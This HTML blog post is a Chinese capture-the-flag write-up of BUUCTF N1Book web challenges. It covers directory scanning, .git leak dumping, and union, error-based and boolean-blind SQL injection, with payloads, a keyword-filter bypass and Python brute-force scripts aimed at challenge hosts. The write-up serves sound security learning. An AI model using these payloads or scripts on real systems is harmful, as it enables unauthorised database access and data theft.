<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta http-equiv="X-UA-Compatible" content="ie=edge" />
    <title>N1Book Web 学习 | Iluvata&#39;s Blog</title>

    





<meta name="author" content="Iluvata" />
<meta name="description" content="" />



<meta name="generator" content="Hugo 0.87.0" />

<link rel="canonical" href="https://iluvata.github.io/post/2021-12-28_n1book-web/" />


<meta property="og:title" content="N1Book Web 学习" />
<meta property="og:description" content="buuctf n1book web刷题
信息收集  常见的收集  网站上可能会有敏感目录/文件导致信息泄漏，如.git，vim的备份文件.swp等。可以用dirsearch扫描站点目录。
cd dirsearch python3 dirsearch.py -u 192.168.21.128 -e php    -u 指定目标ip
  -e 指定网站语言
  -w 可以加上自己的字典（带上路径）
  –random-agents 使用代理（使用的代理目录在uesr-agents.txt中，可以自己添加）
  脚本扫描的数据库在 db 文件夹，可以自己加。这题的目标文件有三个： robots.txt , index.php~ , .index.php.swp 。我一开始扫了2次没扫出来，指定了php语言后扫出了robots.txt。
 robots.txt是网站定的允许爬虫规则；后缀为~的是gedit的备份文件；.文件名.swp是vim的备份文件。
  粗心的小李  git泄漏题可以用的工具有GitHack，scrabble。只要目标网站上有.git，运行脚本就能把网站dump下来。
GitHack.py http://www.openssl.org/.git/  scrabble http://example.com/      SQL注入    数字型注入 若输入参数为1，查询的语句为 select * from table where id=1 。若输入参数为1&#43;1返回2的结果，基本能确定是数字型输入。 参数前后没有过滤也没有引号，可以直接union。" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://iluvata.github.io/post/2021-12-28_n1book-web/" /><meta property="article:section" content="post" />
<meta property="article:published_time" content="2021-12-28T00:17:37+08:00" />
<meta property="article:modified_time" content="2021-12-28T00:17:37+08:00" />




<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="N1Book Web 学习"/>
<meta name="twitter:description" content="buuctf n1book web刷题
信息收集  常见的收集  网站上可能会有敏感目录/文件导致信息泄漏，如.git，vim的备份文件.swp等。可以用dirsearch扫描站点目录。
cd dirsearch python3 dirsearch.py -u 192.168.21.128 -e php    -u 指定目标ip
  -e 指定网站语言
  -w 可以加上自己的字典（带上路径）
  –random-agents 使用代理（使用的代理目录在uesr-agents.txt中，可以自己添加）
  脚本扫描的数据库在 db 文件夹，可以自己加。这题的目标文件有三个： robots.txt , index.php~ , .index.php.swp 。我一开始扫了2次没扫出来，指定了php语言后扫出了robots.txt。
 robots.txt是网站定的允许爬虫规则；后缀为~的是gedit的备份文件；.文件名.swp是vim的备份文件。
  粗心的小李  git泄漏题可以用的工具有GitHack，scrabble。只要目标网站上有.git，运行脚本就能把网站dump下来。
GitHack.py http://www.openssl.org/.git/  scrabble http://example.com/      SQL注入    数字型注入 若输入参数为1，查询的语句为 select * from table where id=1 。若输入参数为1&#43;1返回2的结果，基本能确定是数字型输入。 参数前后没有过滤也没有引号，可以直接union。"/>


<link rel="stylesheet" href="/css/semantic.min.css" />
<link rel="stylesheet" href="/css/icomoon.css" />
<link rel="stylesheet" href="/css/OverlayScrollbars.min.css" />
<link rel="stylesheet" href="/css/github-markdown.css" />
<link rel="stylesheet" href="/css/site.css" />

<style>
  a:hover {
    text-decoration: underline; 
  }

  
  a {
    color: seagreen !important;
  }
  

  
  .inverted a,
  .inverted a:hover {
     color: darkseagreen !important;
  }
  

  
  body.default {
    
    background-color: black;
    

    
  }
  

  
</style>

    






  </head>

  <body class="default">
    
<nav class="ui secondary inverted menu dream-menu">

  <div class="item">
    <i class="large link bullseye icon dream-flip-toggle" title="Flip it!"></i>
  </div>
  <div class="item">
    <i class="large link home icon" title="Home" onclick="window.location.href = 'https:\/\/iluvata.github.io'"></i>
  </div>
  <div class="item">
    <i class="large link icon theme-switch" onclick="themeSwitch()"></i>
  </div>
  
</nav>

    <div class="flip-container">
      <div class="flipper">
        <section class="front">
          <div class="dream-max-width">
            
<div class="ui centered relaxed grid dream-grid">
  <div class="sixteen wide mobile sixteen wide tablet twelve wide computer column markdown-body dream-single" id="dream-save-post-as-img">
    
    <section class="ui top attached segment">
      <header>
        <h1 class="ui large header">
          N1Book Web 学习
          <div class="sub header">
            @
            
              Iluvata
            

            | 
                Tuesday, Dec 28, 2021
              

            | 3 minutes read

            | Update at
              
                Tuesday, Dec 28, 2021
              
          </div>
        </h1>
      </header>

      <article class="main">
<p>
<a href="https://buuoj.cn/challenges">buuctf</a> n1book web刷题</p>
<div id="outline-container-headline-1" class="outline-2">
<h2 id="headline-1">
信息收集
</h2>
<div id="outline-text-headline-1" class="outline-text-2">
<div id="outline-container-headline-2" class="outline-3">
<h3 id="headline-2">
常见的收集
</h3>
<div id="outline-text-headline-2" class="outline-text-3">
<p>网站上可能会有敏感目录/文件导致信息泄漏，如.git，vim的备份文件.swp等。可以用<a href="https://github.com/maurosoria/dirsearch">dirsearch</a>扫描站点目录。</p>
<div class="src src-shell">
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">cd dirsearch
python3 dirsearch.py -u 192.168.21.128 -e php</code></pre></div>
</div>
<ul>
<li>
<p>-u 指定目标ip</p>
</li>
<li>
<p>-e 指定网站语言</p>
</li>
<li>
<p>-w 可以加上自己的字典（带上路径）</p>
</li>
<li>
<p>–random-agents 使用代理（使用的代理目录在uesr-agents.txt中，可以自己添加）</p>
</li>
</ul>
<p>脚本扫描的数据库在 <code class="verbatim">db</code> 文件夹，可以自己加。这题的目标文件有三个： <code class="verbatim">robots.txt</code> , <code class="verbatim">index.php~</code> , <code class="verbatim">.index.php.swp</code> 。我一开始扫了2次没扫出来，指定了php语言后扫出了robots.txt。</p>
<p>
robots.txt是网站定的允许爬虫规则；后缀为~的是gedit的备份文件；.文件名.swp是vim的备份文件。</p>
</div>
</div>
<div id="outline-container-headline-3" class="outline-3">
<h3 id="headline-3">
粗心的小李
</h3>
<div id="outline-text-headline-3" class="outline-text-3">
<p>git泄漏题可以用的工具有<a href="https://github.com/lijiejie/githack">GitHack</a>，<a href="https://github.com/denny0223/scrabble">scrabble</a>。只要目标网站上有.git，运行脚本就能把网站dump下来。</p>
<div class="src src-shell">
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">GitHack.py http://www.openssl.org/.git/</code></pre></div>
</div>
<div class="src src-shell">
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">scrabble http://example.com/</code></pre></div>
</div>
</div>
</div>
</div>
</div>
<div id="outline-container-headline-4" class="outline-2">
<h2 id="headline-4">
SQL注入
</h2>
<div id="outline-text-headline-4" class="outline-text-2">
<ul>
<li>
<p>数字型注入
若输入参数为1，查询的语句为 <code class="verbatim">select * from table where id=1</code> 。若输入参数为1+1返回2的结果，基本能确定是数字型输入。
参数前后没有过滤也没有引号，可以直接union。</p>
</li>
<li>
<p>字符型注入
在输入参数前后加了引号。若输入参数为1，查询语句为 <code class="verbatim">select * from table where id = &#39;1&#39;</code> 。可以通过补全引号后在后面加union，在最后加上#或者–+注释掉之后的内容。</p>
</li>
<li>
<p>报错注入
mysql中 <code class="verbatim">updatexml</code> 函数是用于更新xml文档的函数，语法是 <code class="verbatim">updatexml(目标xml文档, xml内路径, 更新的内容)</code> 第二个参数应该为合法的xpath路径，否则会报错同时输出传入的参数。可以用 <code class="verbatim">concat</code> 在语句前拼接一个 <code class="verbatim">&#39;~&#39;</code> 构造一个非法的xpath，系统会执行后面语句后返回结果，就变成了普通的字符型注入。</p>
</li>
</ul>
<div id="outline-container-headline-5" class="outline-3">
<h3 id="headline-5">
SQL注入-1
</h3>
<div id="outline-text-headline-5" class="outline-text-3">
<p>先测试一下，发现只有id=1, 2, 3的时候有内容。id=3的时候提示有后门参数tips，tips=1会显示出执行的sql语句。</p>
<p>
<img src="/img/2021-12-29_sql1-tips.png" alt="/img/2021-12-29_sql1-tips.png" title="/img/2021-12-29_sql1-tips.png" /></p>
<p>
可以看出是字符形式的注入。执行 <code class="verbatim">select * from notes where id =&#39;-1&#39; union select 1,2, group_concat(table_name) from information_schema.tables where table_schema=database()#&#39;</code> 获取表名，查到有个表 <code class="verbatim">fl4g</code> 。要注意select出来的个数必须为3，直接 <code class="verbatim">select *</code> 查不到东西。应该是后台过滤了参数必须为3个，并且只有后面两个会显示，所以查出来的 <code class="verbatim">table_name</code> 也要用 <code class="verbatim">group_concat</code> 合并为一个字段。拿到表名后执行 <code class="verbatim">select * from notes where id =&#39;4&#39; union select 1,2,group_concat(column_name) from information_schema.columns where table_name = &#39;fl4g&#39; #&#39;</code> 获取到列名为fllllag。最后执行 <code class="verbatim">select * from notes where id = &#39;4&#39; union select 1,2,fllllag from fl4g</code> 就能获取flag。</p>
</div>
</div>
<div id="outline-container-headline-6" class="outline-3">
<h3 id="headline-6">
SQL注入-2
</h3>
<div id="outline-text-headline-6" class="outline-text-3">
<p>看源码发现提示，参数加入 <code class="verbatim">&amp;tips=1</code> 的时候会返回报错信息，是报错注入，如果不加提示就是布尔盲注。先来看用提示的。</p>
<p>
随便输入用户名会提示账号不存在，用户名输admin提示账号或密码错误。注入点在用户名。执行 <code class="verbatim">name=admin&#39; and (select extractvalue(1,concat(0x7e,(database()))))--+&amp;pass=123</code> 拿到库名 <code class="verbatim">note</code> ， <code class="verbatim">name=admin&#39; and extractvalue(1,concat(0x7e,select group_concat(table_name) from information_schema.tables where table_schema = &#39;note&#39;))--+&amp;pass=123</code> 拿表名。看错误提示猜测 <code class="verbatim">select</code> 被过滤了，用双写 <code class="verbatim">selselectect</code> 替换 <code class="verbatim">select</code> 拿到表名 <code class="verbatim">fl4g</code> 。 <code class="verbatim">name=admin&#39; and (selselectect extractvalue(1,concat(0x7e,(seleselectct group_concat(column_name) from information_schema.columns where table_name = &#39;fl4g&#39;))))--+&amp;pass=123</code> 拿到列名 <code class="verbatim">flag</code> ， <code class="verbatim">name=admin&#39; and(select extractvalue(1,concat(0x7e,(selselectect group_concat(flag) from fl4g))))--+&amp;pass=123</code> 拿到flag。</p>
<p>
盲注参考了<a href="https://www.cnblogs.com/xiaochaofang/p/14873459.html">这篇博客</a>。在用户名字段拼接上语句，若后面的语句成功执行，会提示“用户名或密码错误”，否则会提示“找不到用户”。这其实是布尔盲注，能够获得的信息只有真假值。要是连布尔返回值也没有，就只能用时间盲注了，也就是在语句最后连上 <code class="verbatim">or sleep(1)</code> ，根据返回时间判断是否执行，从而转换为布尔盲注。</p>
<p>
先测试库名长度 <code class="verbatim">name=1&#39; or length(database())=4#&amp;pass=asdasd</code> ，数字为4的时候返回“用户名或密码错误”，确定库名长度为4。随后用 <code class="verbatim">name=1&#39; or substr(database(),1,1) =&#39;n&#39;#&amp;pass=asdasd</code> 一个一个字符测试库名。之后和前面的注入一样，找表名和列名，输出flag。用下面脚本爆破得到库名</p>
<div class="src src-python">
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python"><span style="color:#f92672">import</span> requests
<span style="color:#f92672">import</span> time

l <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{&#39;</span>          <span style="color:#75715e">#可能的字符</span>
url <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;http://dc879727-d344-4402-aee0-5d997fcf4208.node3.buuoj.cn/login.php&#39;</span>
sql <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;1&#39; or substr(database(),</span><span style="color:#e6db74">%d</span><span style="color:#e6db74">,1)=&#39;</span><span style="color:#e6db74">%s</span><span style="color:#e6db74">&#39;#&#34;</span>             <span style="color:#75715e">#构造的注入语句</span>
flag <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;&#39;</span>
<span style="color:#66d9ef">for</span> num <span style="color:#f92672">in</span> range(<span style="color:#ae81ff">1</span>,<span style="color:#ae81ff">5</span>):           <span style="color:#75715e">#根据库名长度进行循环</span>
    <span style="color:#66d9ef">for</span> i <span style="color:#f92672">in</span> l:
        data <span style="color:#f92672">=</span> {                <span style="color:#75715e">#构造字典数据</span>
            <span style="color:#e6db74">&#39;name&#39;</span> : sql <span style="color:#f92672">%</span>(num,i),          <span style="color:#75715e">#把循环变量放入的sql语句中构造完整变化的sql语句</span>
            <span style="color:#e6db74">&#39;pass&#39;</span> : <span style="color:#e6db74">&#39;asdasd&#39;</span>
        }
        r <span style="color:#f92672">=</span> requests<span style="color:#f92672">.</span>post(url <span style="color:#f92672">=</span> url , data<span style="color:#f92672">=</span>data)        <span style="color:#75715e">#对url提交post请求，data为用户名密码数据</span>
        time<span style="color:#f92672">.</span>sleep(<span style="color:#ae81ff">0.2</span>)         <span style="color:#75715e">#等待时间</span>
        <span style="color:#66d9ef">if</span> <span style="color:#e6db74">r</span><span style="color:#e6db74">&#34;\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef&#34;</span> <span style="color:#f92672">in</span> r<span style="color:#f92672">.</span>text:     <span style="color:#75715e">#根据回显确定库名</span>
            flag <span style="color:#f92672">+=</span> i
            print(<span style="color:#e6db74">&#34;flag:&#34;</span> , flag)
            <span style="color:#66d9ef">break</span>
print(<span style="color:#e6db74">&#34;flag:&#34;</span>, flag)</code></pre></div>
</div>
<p>
爆表名</p>
<div class="src src-python">
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python"><span style="color:#f92672">import</span> requests
<span style="color:#f92672">import</span> time
l <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{&#39;</span>          <span style="color:#75715e">#可能的字符</span>
url <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;http://1b1372ff-b5cb-4f72-98c5-bc9d1f4d321d.node3.buuoj.cn/login.php&#39;</span>
<span style="color:#75715e">#sql = &#34;1&#39; or substr(database(),%d,1)=&#39;%s&#39;#&#34;             #构造的注入语句</span>
sql <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;1&#39; or substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),</span><span style="color:#e6db74">%d</span><span style="color:#e6db74">,1)=&#39;</span><span style="color:#e6db74">%s</span><span style="color:#e6db74">&#39;#&#34;</span>
flag <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;&#39;</span>
<span style="color:#66d9ef">for</span> num <span style="color:#f92672">in</span> range(<span style="color:#ae81ff">1</span>,<span style="color:#ae81ff">10</span>):           <span style="color:#75715e">#根据库名长度进行循环（因为不确定表名长度，我试着写长度稍微大点）</span>
    <span style="color:#66d9ef">for</span> i <span style="color:#f92672">in</span> l:
        data <span style="color:#f92672">=</span> {                <span style="color:#75715e">#构造字典数据</span>
            <span style="color:#e6db74">&#39;name&#39;</span> : sql <span style="color:#f92672">%</span>(num,i),          <span style="color:#75715e">#把循环变量放入的sql语句中构造完整变化的sql语句</span>
            <span style="color:#e6db74">&#39;pass&#39;</span> : <span style="color:#e6db74">&#39;asdasd&#39;</span>
        }
        r <span style="color:#f92672">=</span> requests<span style="color:#f92672">.</span>post(url <span style="color:#f92672">=</span> url , data<span style="color:#f92672">=</span>data)        <span style="color:#75715e">#对url提交post请求，data为用户名密码数据</span>
        time<span style="color:#f92672">.</span>sleep(<span style="color:#ae81ff">0.2</span>)         <span style="color:#75715e">#等待时间</span>
        <span style="color:#66d9ef">if</span> <span style="color:#e6db74">r</span><span style="color:#e6db74">&#34;\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef&#34;</span> <span style="color:#f92672">in</span> r<span style="color:#f92672">.</span>text:     <span style="color:#75715e">#根据回显确定库名</span>
            flag <span style="color:#f92672">+=</span> i
            print(<span style="color:#e6db74">&#34;flag:&#34;</span> , flag)
            <span style="color:#66d9ef">break</span>
print(<span style="color:#e6db74">&#34;flag:&#34;</span>, flag)</code></pre></div>
</div>
<p>字段名</p>
<div class="src src-python">
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python"><span style="color:#f92672">import</span> requests
<span style="color:#f92672">import</span> time

l <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{&#39;</span>
url <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;http://8454f388-49f3-4980-962b-7b7781dce053.node3.buuoj.cn/login.php&#39;</span>
<span style="color:#75715e">#sql = &#34;1&#39; or substr(database(),%d,1)=&#39;%s&#39;#&#34;</span>
<span style="color:#75715e">#sql = &#34;1&#39; or substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)=&#39;%s&#39;#&#34;</span>
sql <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;1&#39; or substr((seLEct group_concat(column_name) from information_schema.columns where table_name=&#39;fl4g&#39;),</span><span style="color:#e6db74">%d</span><span style="color:#e6db74">,1)=&#39;</span><span style="color:#e6db74">%s</span><span style="color:#e6db74">&#39;#&#34;</span>
flag <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;&#39;</span>
<span style="color:#66d9ef">for</span> num <span style="color:#f92672">in</span> range(<span style="color:#ae81ff">1</span>,<span style="color:#ae81ff">13</span>):
    <span style="color:#66d9ef">for</span> i <span style="color:#f92672">in</span> l:
        data <span style="color:#f92672">=</span> {
            <span style="color:#e6db74">&#39;name&#39;</span> : sql <span style="color:#f92672">%</span>(num,i),
            <span style="color:#e6db74">&#39;pass&#39;</span> : <span style="color:#e6db74">&#39;asdasd&#39;</span>
        }
        r <span style="color:#f92672">=</span> requests<span style="color:#f92672">.</span>post(url <span style="color:#f92672">=</span> url , data<span style="color:#f92672">=</span>data)
        time<span style="color:#f92672">.</span>sleep(<span style="color:#ae81ff">0.2</span>)
        <span style="color:#66d9ef">if</span> <span style="color:#e6db74">r</span><span style="color:#e6db74">&#34;\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef&#34;</span> <span style="color:#f92672">in</span> r<span style="color:#f92672">.</span>text:
            flag <span style="color:#f92672">+=</span> i
            print(<span style="color:#e6db74">&#34;flag:&#34;</span> , flag)
            <span style="color:#66d9ef">break</span>
print(<span style="color:#e6db74">&#34;flag:&#34;</span>, flag)</code></pre></div>
</div>
<p>flag</p>
<div class="src src-python">
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python"><span style="color:#f92672">import</span> requests
<span style="color:#f92672">import</span> time

l <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{&#39;</span>
url <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;http://8454f388-49f3-4980-962b-7b7781dce053.node3.buuoj.cn/login.php&#39;</span>
<span style="color:#75715e">#sql = &#34;1&#39; or substr(database(),%d,1)=&#39;%s&#39;#&#34;</span>
<span style="color:#75715e">#sql = &#34;1&#39; or substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)=&#39;%s&#39;#&#34;</span>
<span style="color:#75715e">#sql = &#34;1&#39; or substr((seLEct group_concat(column_name) from information_schema.columns where table_name=&#39;fl4g&#39;),%d,1)=&#39;%s&#39;#&#34;</span>
sql <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;1&#39; or substr((seLEct flag from fl4g),</span><span style="color:#e6db74">%d</span><span style="color:#e6db74">,1)=&#39;</span><span style="color:#e6db74">%s</span><span style="color:#e6db74">&#39;#&amp;pass=asdasd&#34;</span>
flag <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;&#39;</span>
<span style="color:#66d9ef">for</span> num <span style="color:#f92672">in</span> range(<span style="color:#ae81ff">1</span>,<span style="color:#ae81ff">30</span>):
    <span style="color:#66d9ef">for</span> i <span style="color:#f92672">in</span> l:
        data <span style="color:#f92672">=</span> {
            <span style="color:#e6db74">&#39;name&#39;</span> : sql <span style="color:#f92672">%</span>(num,i),
            <span style="color:#e6db74">&#39;pass&#39;</span> : <span style="color:#e6db74">&#39;asdasd&#39;</span>
        }
        r <span style="color:#f92672">=</span> requests<span style="color:#f92672">.</span>post(url <span style="color:#f92672">=</span> url , data<span style="color:#f92672">=</span>data)
        time<span style="color:#f92672">.</span>sleep(<span style="color:#ae81ff">0.2</span>)
        <span style="color:#66d9ef">if</span> <span style="color:#e6db74">r</span><span style="color:#e6db74">&#34;\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef&#34;</span> <span style="color:#f92672">in</span> r<span style="color:#f92672">.</span>text:
            flag <span style="color:#f92672">+=</span> i
            print(<span style="color:#e6db74">&#34;flag:&#34;</span> , flag)
            <span style="color:#66d9ef">break</span>
print(<span style="color:#e6db74">&#34;flag:&#34;</span>, flag)</code></pre></div>
</div>
</div>
</div>
</div>
</div>
</article>
    </section>

    <footer class="ui attached segment dream-tags" data-html2canvas-ignore>
      
        
          <a class="ui label" href="/tags/ctf" title="ctf">ctf</a>
        
          <a class="ui label" href="/tags/web" title="web">web</a>
        
      
      <div
        class="ui label"
        style="float: right; cursor: pointer;"
        onclick="savePostAsImg()">
        <i class="save icon"></i>Save as image
      </div>
    </footer>

    

    
    
    

    

  </div>
  <aside class="sixteen wide mobile sixteen wide tablet four wide computer column dream-single-aside">
    
    
      <div class="ui segment toc">
        <nav id="TableOfContents">
<ul>
<li><a href="#headline-1">信息收集</a>
<ul>
<li><a href="#headline-2">常见的收集</a>
</li>
<li><a href="#headline-3">粗心的小李</a>
</li>
</ul>
</li>
<li><a href="#headline-4">SQL注入</a>
<ul>
<li><a href="#headline-5">SQL注入-1</a>
</li>
<li><a href="#headline-6">SQL注入-2</a>
</li>
</ul>
</li>
</ul>
</nav>
      </div>
    

    <article class="dream-header">
  <section class="ui top attached center aligned segment">
    <div class="ui small circular image">
      
        <img src="/img/avatar.png">
      
    </div>

    
    <h1 class="ui medium header">
    
      Iluvata&#39;s blog
      <div class="sub header" style="margin-top: 0.5rem;">shine on you crazy diamond</div>
    
    </h1>
    

    <div class="ui horizontal list">
      
      <a class="item" href="/tags">
        <i class="tags icon" title="All Tags"></i>
      </a>
      <a class="item" href="/categories">
        <i class="th list icon" title="All Categories"></i>
      </a>
    </div>
  </section>

  
  <section class="ui attached center aligned segment dream-tags">
    
      
      
      <a class="ui label" href="/tags/algorithm/" title="Algorithm">
        Algorithm
      </a>
    
      
      
      <a class="ui label" href="/tags/ctf/" title="Ctf">
        Ctf
      </a>
    
      
      
      <a class="ui label" href="/tags/emacs/" title="Emacs">
        Emacs
      </a>
    
      
      
      <a class="ui label" href="/tags/hugo/" title="Hugo">
        Hugo
      </a>
    
      
      
      <a class="ui label" href="/tags/information/" title="Information">
        Information
      </a>
    
      
      
      <a class="ui label" href="/tags/math/" title="Math">
        Math
      </a>
    
      
      
      <a class="ui label" href="/tags/operating-system/" title="Operating System">
        Operating System
      </a>
    
      
      
      <a class="ui label" href="/tags/pwn/" title="Pwn">
        Pwn
      </a>
    
      
      
      <a class="ui label" href="/tags/sicp/" title="Sicp">
        Sicp
      </a>
    
      
      
      <a class="ui label" href="/tags/web/" title="Web">
        Web
      </a>
    
      
      
      <a class="ui label" href="/tags/work/" title="Work">
        Work
      </a>
    
      
      
      <a class="ui label" href="/tags/%E8%80%83%E7%A0%94/" title="考研">
        考研
      </a>
    
  </section>
  

  
  <section class="ui attached segment dream-categories">
    <div class="ui accordion">
      
      
      
      
      

      
        

        
          <div class="title">
            <i class="dropdown icon"></i>
            
            
            <a class="item" href="/categories/learning/" title="Learning">
              Learning
            </a>
          </div>
          <div class="content">
            <div class="ui list">
            
              <div class="item">
                <div class="content">
                  <a class="item" href="/post/2021-12-28_hugo-with-latex/">在hugo中使用latex</a>
                </div>
              </div>
            
              <div class="item">
                <div class="content">
                  <a class="item" href="/post/2021-12-28_structural-information/">结构信息论</a>
                </div>
              </div>
            
              <div class="item">
                <div class="content">
                  <a class="item" href="/post/2021-12-28_n1book-web/">N1Book Web 学习</a>
                </div>
              </div>
            
              <div class="item">
                <div class="content">
                  <a class="item" href="/post/2021-12-23_heap/">pwn堆题整理</a>
                </div>
              </div>
            
              <div class="item">
                <div class="content">
                  <a class="item" href="/post/2021-11-13_rop/">ROP</a>
                </div>
              </div>
            
              <div class="item">
                <div class="content">
                  <a class="item" href="/post/2021-11-10_ctf-libc-leak/">libc泄漏</a>
                </div>
              </div>
            
              <div class="item">
                <div class="content">
                  <a class="item" href="/post/2021-09-24_ctf-tools/">CTF基本工具使用指北</a>
                </div>
              </div>
            
              <div class="item">
                <div class="content">
                  <a class="item" href="/post/2021-04-07_iteration-and-recurtion/">迭代与递归</a>
                </div>
              </div>
            
              <div class="item">
                <div class="content">
                  <a class="item" href="/post/2021-03-19_distributions/">概率统计中的分布</a>
                </div>
              </div>
            
              <div class="item">
                <div class="content">
                  <a class="item" href="/post/2021-03-15_computer-structure/">计算机体系结构与组成原理</a>
                </div>
              </div>
            
              <div class="item">
                <div class="content">
                  <a class="item" href="/post/2021-03-14_basic-elements-for-programming-language/">编程语言的基本组成</a>
                </div>
              </div>
            
              <div class="item">
                <div class="content">
                  <a class="item" href="/post/2021-03-09_file-and-database/">文件系统与数据库系统</a>
                </div>
              </div>
            
              <div class="item">
                <div class="content">
                  <a class="item" href="/post/2021-03-04_euler-circuit-and-hamiltonian-circuit/">欧拉环路和汉密尔顿环路</a>
                </div>
              </div>
            
              <div class="item">
                <div class="content">
                  <a class="item" href="/post/2021-03-01_how-computer-startup/">电脑是怎么启动的</a>
                </div>
              </div>
            
              <div class="item">
                <div class="content">
                  <a class="item" href="/post/2021-02-24_greedy-and-dijkstra/">理解贪心算法与Dijkstra算法</a>
                </div>
              </div>
            
              <div class="item">
                <div class="content">
                  <a class="item" href="/post/2021-02-19_dp-and-warshall/">理解动态规划与warshall算法</a>
                </div>
              </div>
            
            </div>
          </div>
        
      
        

        
          <div class="title">
            <i class="dropdown icon"></i>
            
            
            <a class="item" href="/categories/life/" title="Life">
              Life
            </a>
          </div>
          <div class="content">
            <div class="ui list">
            
              <div class="item">
                <div class="content">
                  <a class="item" href="/post/2021-04-19_likehood-reasoning/">最大似然估计与基本演绎法</a>
                </div>
              </div>
            
              <div class="item">
                <div class="content">
                  <a class="item" href="/post/2021-02-22_latex-with-emacs/">在org mode中嵌入latex</a>
                </div>
              </div>
            
              <div class="item">
                <div class="content">
                  <a class="item" href="/post/2021-02-16_yearly-review/">2020年度回顾以及新年目标</a>
                </div>
              </div>
            
              <div class="item">
                <div class="content">
                  <a class="item" href="/post/2021-02-02_scheme-in-emacs/">在spacemacs中写scheme</a>
                </div>
              </div>
            
              <div class="item">
                <div class="content">
                  <a class="item" href="/post/2021-02-02_hugo-with-emacs/">用easy-hugo在spacemacs中写hugo博客</a>
                </div>
              </div>
            
              <div class="item">
                <div class="content">
                  <a class="item" href="/post/2021-01-27_hugo-config/">hugo 博客配置</a>
                </div>
              </div>
            
            </div>
          </div>
        
      

      
    </div>
  </section>
  

  <section class="ui attached segment header-socials">
    <nav class="ui secondary menu dream-menu dream-socials">
  
  
    <div class="item">
      <a href="mailto:dyhdjyc@gmail.com">
        <i class=" mail icon" title="Email"></i>
      </a>
    </div>
  

  

  

  

  

  

  

  

  
</nav>

  </section>

  <section class="ui bottom attached center aligned segment">
    
      <p>© 2021 - 2022 Iluvata&#39;s Blog</p>
    

    <p>Powered by <a href="https://gohugo.io/" target="_blank">Hugo</a> with theme <a href="https://github.com/g1eny0ung/hugo-theme-dream" target="_blank">Dream</a>.</p>

    
  </section>
</article>

  </aside>
</div>

          </div>
        </section>
        <section class="back">
          <div class="dream-max-width">
            <div class="ui centered relaxed grid dream-grid dream-back">
  
  
  

  <section class="sixteen wide mobile eight wide tablet four wide computer column dream-column">
    <article>
      <div class="ui top attached segment">
        <h3 class="ui header">Social Links</h3>
      </div>
      <div class="ui bottom attached segment">
        <nav class="ui secondary menu dream-menu dream-socials">
  
  
    <div class="item">
      <a href="mailto:dyhdjyc@gmail.com">
        <i class="large mail icon" title="Email"></i>
      </a>
    </div>
  

  

  

  

  

  

  

  

  
</nav>

      </div>
    </article>
  </section>

  <section class="sixteen wide mobile eight wide tablet four wide computer column dream-column">
    
  </section>

  
    
  
</div>

          </div>
        </section>
      </div>
    </div>

    <script>
  window.defaultDark =  null 
  window.backgroundDark =  null 
  window.backgroundImageDark =  null 
  window.darkNav =  true 
  window.hasTwitterEmbed =  null 

  if (window.hasTwitterEmbed) {
    
    window.twttr = (function (d, s, id) {
      var js,
        fjs = d.getElementsByTagName(s)[0],
        t = window.twttr || {}
      if (d.getElementById(id)) return t
      js = d.createElement(s)
      js.id = id
      js.src = 'https://platform.twitter.com/widgets.js'
      fjs.parentNode.insertBefore(js, fjs)

      t._e = []
      t.ready = function (f) {
        t._e.push(f)
      }

      return t
    })(document, 'script', 'twitter-wjs')
  }
</script>
<script src="/js/jquery.min.js"></script>
<script src="/js/semantic.min.js"></script>
<script src="/js/jquery.overlayScrollbars.min.js"></script>
<script src="/js/header.js"></script>
<script src="/js/main.js"></script>
<script src="/js/theme.js"></script>

    
<script src="/js/html2canvas.min.js"></script>
<script src="/js/post.js"></script>





    

    
  </body>
</html>
